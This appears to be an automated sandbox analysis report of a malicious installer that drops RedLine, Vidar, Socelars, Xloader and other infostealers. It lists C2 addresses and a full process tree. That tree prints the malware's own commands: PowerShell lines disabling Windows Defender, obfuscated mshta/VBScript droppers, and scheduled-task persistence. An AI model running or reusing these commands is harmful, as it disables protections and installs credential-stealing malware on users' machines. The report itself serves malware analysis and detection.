Resubmissions
27-10-2021 12:55
211027-p592qaegd7 1027-10-2021 05:03
211027-fpnzwaaff8 1026-10-2021 14:24
211026-rqs6rshff8 10Analysis
-
max time kernel
27s -
max time network
1764s -
platform
windows11_x64 -
resource
win11 -
submitted
26-10-2021 14:24
General
-
Target
setup_x86_x64_install.exe
-
Size
5.6MB
-
MD5
8dfefd1f56f2ac4f1869d86edbb4aa8f
-
SHA1
3a65b0920890fd7e8ae751ee15f76de281584010
-
SHA256
433e51a49b84a52cd5f740a12ec46a145d3c14a95e529d4ef32fd250e02829ed
-
SHA512
996a84df42b79c8786f4347b875621a476bd6a0e71d4c61fd47a726fb9f6717051d03d8b381233e7966c1a2150628b8b7986727298a6fc803aea504f96fd934c
Score
10/10
Malware Config
Extracted
Family
redline
Botnet
ChrisNEW
C2
194.104.136.5:46013
Extracted
Family
redline
Botnet
media25
C2
91.121.67.60:23325
Extracted
Family
xloader
Version
2.5
Campaign
s0iw
C2
http://www.kyiejenner.com/s0iw/
Decoy
ortopediamodelo.com
orimshirts.store
universecatholicweekly.info
yvettechan.com
sersaudavelsempre.online
face-booking.net
europeanretailgroup.com
umofan.com
roemahbajumuslim.online
joyrosecuisine.net
3dmaker.house
megdb.xyz
stereoshopie.info
gv5rm.com
tdc-trust.com
mcglobal.club
choral.works
onlineconsultantgroup.com
friscopaintandbody.com
midwestii.com
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Xloader
Xloader is a rebranded version of Formbook malware.
-
Vidar Stealer 2 IoCs
-
Xloader Payload 1 IoCs
-
ASPack v2.12-2.42 6 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Blocklisted process makes network request 3 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 35 IoCs
-
Loads dropped DLL 9 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of SetThreadContext 2 IoCs
-
autoit_exe 2 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in Program Files directory 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 15 IoCs
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Kills process with taskkill 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 41 IoCs
-
Suspicious use of FindShellTrayWindow 19 IoCs
-
Suspicious use of SendNotifyMessage 17 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC5510AB3\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC5510AB3\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0985edbf92e08954.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC5510AB3\Tue0985edbf92e08954.exeTue0985edbf92e08954.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09c257807a702a4.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC5510AB3\Tue09c257807a702a4.exeTue09c257807a702a4.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 15486⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0978af55b9.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC5510AB3\Tue0978af55b9.exeTue0978af55b9.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 2728⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5220 -s 17128⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"9⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"12⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵
-
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "13⤵
- Blocklisted process makes network request
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"13⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC13⤵
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"10⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5680 -s 6008⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\juanli-game.exe"C:\Users\Admin\AppData\Local\Temp\juanli-game.exe"7⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=18⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"9⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10.exe"C:\Users\Admin\AppData\Local\Temp\10.exe"7⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"7⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe10⤵
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09a30919dc5f00.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC5510AB3\Tue09a30919dc5f00.exeTue09a30919dc5f00.exe5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09c1731fe55c7.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC5510AB3\Tue09c1731fe55c7.exeTue09c1731fe55c7.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSC5510AB3\Tue09c1731fe55c7.exeC:\Users\Admin\AppData\Local\Temp\7zSC5510AB3\Tue09c1731fe55c7.exe6⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09792fda06e.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC5510AB3\Tue09792fda06e.exeTue09792fda06e.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 1566⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue091e2054cef7.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC5510AB3\Tue091e2054cef7.exeTue091e2054cef7.exe5⤵
- Executes dropped EXE
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Dzpafigaxd.vbs"6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google\Qekdqa.exe'7⤵
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Dzpafigaxd.vbs"6⤵
-
C:\Users\Admin\AppData\Local\Temp\Fphrgjtnjgrqbtrochalunsaintly_2021-10-24_21-38.exe"C:\Users\Admin\AppData\Local\Temp\Fphrgjtnjgrqbtrochalunsaintly_2021-10-24_21-38.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5668 -s 2368⤵
- Program crash
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\MSBuild.exeC:\Users\Admin\AppData\Local\Temp\MSBuild.exe6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com7⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09264824c4.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC5510AB3\Tue09264824c4.exeTue09264824c4.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\lvJ1Y9rsF3mHa5_BNzaFz0_L.exe"C:\Users\Admin\Pictures\Adobe Films\lvJ1Y9rsF3mHa5_BNzaFz0_L.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\OsgNZoSbST7fBwSKLgnW8qvL.exe"C:\Users\Admin\Pictures\Adobe Films\OsgNZoSbST7fBwSKLgnW8qvL.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3084 -s 2327⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\PNMKLAPwr5ErzUUHRjsBz37e.exe"C:\Users\Admin\Pictures\Adobe Films\PNMKLAPwr5ErzUUHRjsBz37e.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5536 -s 2807⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\Pictures\Adobe Films\SolUXd1c40w2DqWZtvNdMZxs.exe"C:\Users\Admin\Pictures\Adobe Films\SolUXd1c40w2DqWZtvNdMZxs.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 2407⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\13bpu9cGZVQ3bQBYByHDZulD.exe"C:\Users\Admin\Pictures\Adobe Films\13bpu9cGZVQ3bQBYByHDZulD.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\lgn2jnMR3V1GyJteBmyhVbIn.exe"C:\Users\Admin\Pictures\Adobe Films\lgn2jnMR3V1GyJteBmyhVbIn.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\Documents\0CaBGTTepkzcGygD27zRDEA4.exe"C:\Users\Admin\Documents\0CaBGTTepkzcGygD27zRDEA4.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\vZAh9KkHrYZwRBbnfqgeInmc.exe"C:\Users\Admin\Pictures\Adobe Films\vZAh9KkHrYZwRBbnfqgeInmc.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\x8OLtaEyJL0z2ulkZucMSoCU.exe"C:\Users\Admin\Pictures\Adobe Films\x8OLtaEyJL0z2ulkZucMSoCU.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1640 -s 17329⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\DNsgkluI6G1Ua0lTf2eOoPUF.exe"C:\Users\Admin\Pictures\Adobe Films\DNsgkluI6G1Ua0lTf2eOoPUF.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\DNsgkluI6G1Ua0lTf2eOoPUF.exe"C:\Users\Admin\Pictures\Adobe Films\DNsgkluI6G1Ua0lTf2eOoPUF.exe" -u9⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\CdAiL0JFUdAm66xZzVKAhKX9.exe"C:\Users\Admin\Pictures\Adobe Films\CdAiL0JFUdAm66xZzVKAhKX9.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\oa8FQvwCY6EOdV1JY9eeuSOR.exe"C:\Users\Admin\Pictures\Adobe Films\oa8FQvwCY6EOdV1JY9eeuSOR.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5392 -s 2769⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\69lELfsMHE0347nWGe5r_gCI.exe"C:\Users\Admin\Pictures\Adobe Films\69lELfsMHE0347nWGe5r_gCI.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\bjnk21HEe23_5uO5RrcW4fCC.exe"C:\Users\Admin\Pictures\Adobe Films\bjnk21HEe23_5uO5RrcW4fCC.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-TF297.tmp\bjnk21HEe23_5uO5RrcW4fCC.tmp"C:\Users\Admin\AppData\Local\Temp\is-TF297.tmp\bjnk21HEe23_5uO5RrcW4fCC.tmp" /SL5="$7022C,506127,422400,C:\Users\Admin\Pictures\Adobe Films\bjnk21HEe23_5uO5RrcW4fCC.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-08FI1.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-08FI1.tmp\DYbALA.exe" /S /UID=270910⤵
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\XtDXh0sC8yJuOEufilnYjmUZ.exe"C:\Users\Admin\Pictures\Adobe Films\XtDXh0sC8yJuOEufilnYjmUZ.exe"8⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\gevrmQL0B4tD_i2ekUSkJq_0.exe"C:\Users\Admin\Pictures\Adobe Films\gevrmQL0B4tD_i2ekUSkJq_0.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\6c75f117-0360-4130-a322-ad5cee399cc5\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\6c75f117-0360-4130-a322-ad5cee399cc5\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\6c75f117-0360-4130-a322-ad5cee399cc5\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run7⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\6c75f117-0360-4130-a322-ad5cee399cc5\test.bat"8⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\gevrmQL0B4tD_i2ekUSkJq_0.exe" -Force7⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\gevrmQL0B4tD_i2ekUSkJq_0.exe"C:\Users\Admin\Pictures\Adobe Films\gevrmQL0B4tD_i2ekUSkJq_0.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\mUWMZpz81mXRuU24Z6aKAGGB.exe"C:\Users\Admin\Pictures\Adobe Films\mUWMZpz81mXRuU24Z6aKAGGB.exe"6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0990c8b597f.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC5510AB3\Tue0990c8b597f.exeTue0990c8b597f.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-FF85S.tmp\Tue0990c8b597f.tmp"C:\Users\Admin\AppData\Local\Temp\is-FF85S.tmp\Tue0990c8b597f.tmp" /SL5="$10220,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC5510AB3\Tue0990c8b597f.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zSC5510AB3\Tue0990c8b597f.exe"C:\Users\Admin\AppData\Local\Temp\7zSC5510AB3\Tue0990c8b597f.exe" /SILENT7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-I54MV.tmp\Tue0990c8b597f.tmp"C:\Users\Admin\AppData\Local\Temp\is-I54MV.tmp\Tue0990c8b597f.tmp" /SL5="$3021C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC5510AB3\Tue0990c8b597f.exe" /SILENT8⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-SIEHP.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-SIEHP.tmp\postback.exe" ss19⤵
- Executes dropped EXE
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0956c36b51.exe /mixone4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC5510AB3\Tue0956c36b51.exeTue0956c36b51.exe /mixone5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1052 -s 2406⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0971aafeebb6f.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC5510AB3\Tue0971aafeebb6f.exeTue0971aafeebb6f.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3296 -s 19166⤵
- Program crash
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue093cbcf0222440.exe4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0947ef38552fc.exe4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09786995c7f02a923.exe4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09c6db969ab9.exe4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue097328c1b990.exe4⤵
- Suspicious use of WriteProcessMemory
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC5510AB3\Tue093cbcf0222440.exeTue093cbcf0222440.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSC5510AB3\Tue093cbcf0222440.exe"C:\Users\Admin\AppData\Local\Temp\7zSC5510AB3\Tue093cbcf0222440.exe" -u2⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscrIPT: CLosE( creatEobjeCt ( "WSCRIpt.Shell" ). RUN ( "C:\Windows\system32\cmd.exe /R TYPe ""C:\Users\Admin\AppData\Local\Temp\7zSC5510AB3\Tue09a30919dc5f00.exe"" > ..\WG1uEEN.EXe && StarT ..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u86 & If """" == """" for %b In (""C:\Users\Admin\AppData\Local\Temp\7zSC5510AB3\Tue09a30919dc5f00.exe"" ) do taskkill /f /iM ""%~Nxb"" " , 0 , TRUe ) )1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R TYPe "C:\Users\Admin\AppData\Local\Temp\7zSC5510AB3\Tue09a30919dc5f00.exe" > ..\WG1uEEN.EXe && StarT ..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u86 & If "" == "" for %b In ("C:\Users\Admin\AppData\Local\Temp\7zSC5510AB3\Tue09a30919dc5f00.exe" ) do taskkill /f /iM "%~Nxb"2⤵
-
C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u863⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscrIPT: CLosE( creatEobjeCt ( "WSCRIpt.Shell" ). RUN ( "C:\Windows\system32\cmd.exe /R TYPe ""C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe"" > ..\WG1uEEN.EXe && StarT ..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u86 & If ""-PhwqM9LteEkjDz5gZPyhw9N49u86 "" == """" for %b In (""C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe"" ) do taskkill /f /iM ""%~Nxb"" " , 0 , TRUe ) )4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R TYPe "C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe" > ..\WG1uEEN.EXe && StarT ..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u86 & If "-PhwqM9LteEkjDz5gZPyhw9N49u86 " == "" for %b In ("C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe" ) do taskkill /f /iM "%~Nxb"5⤵
-
-
-
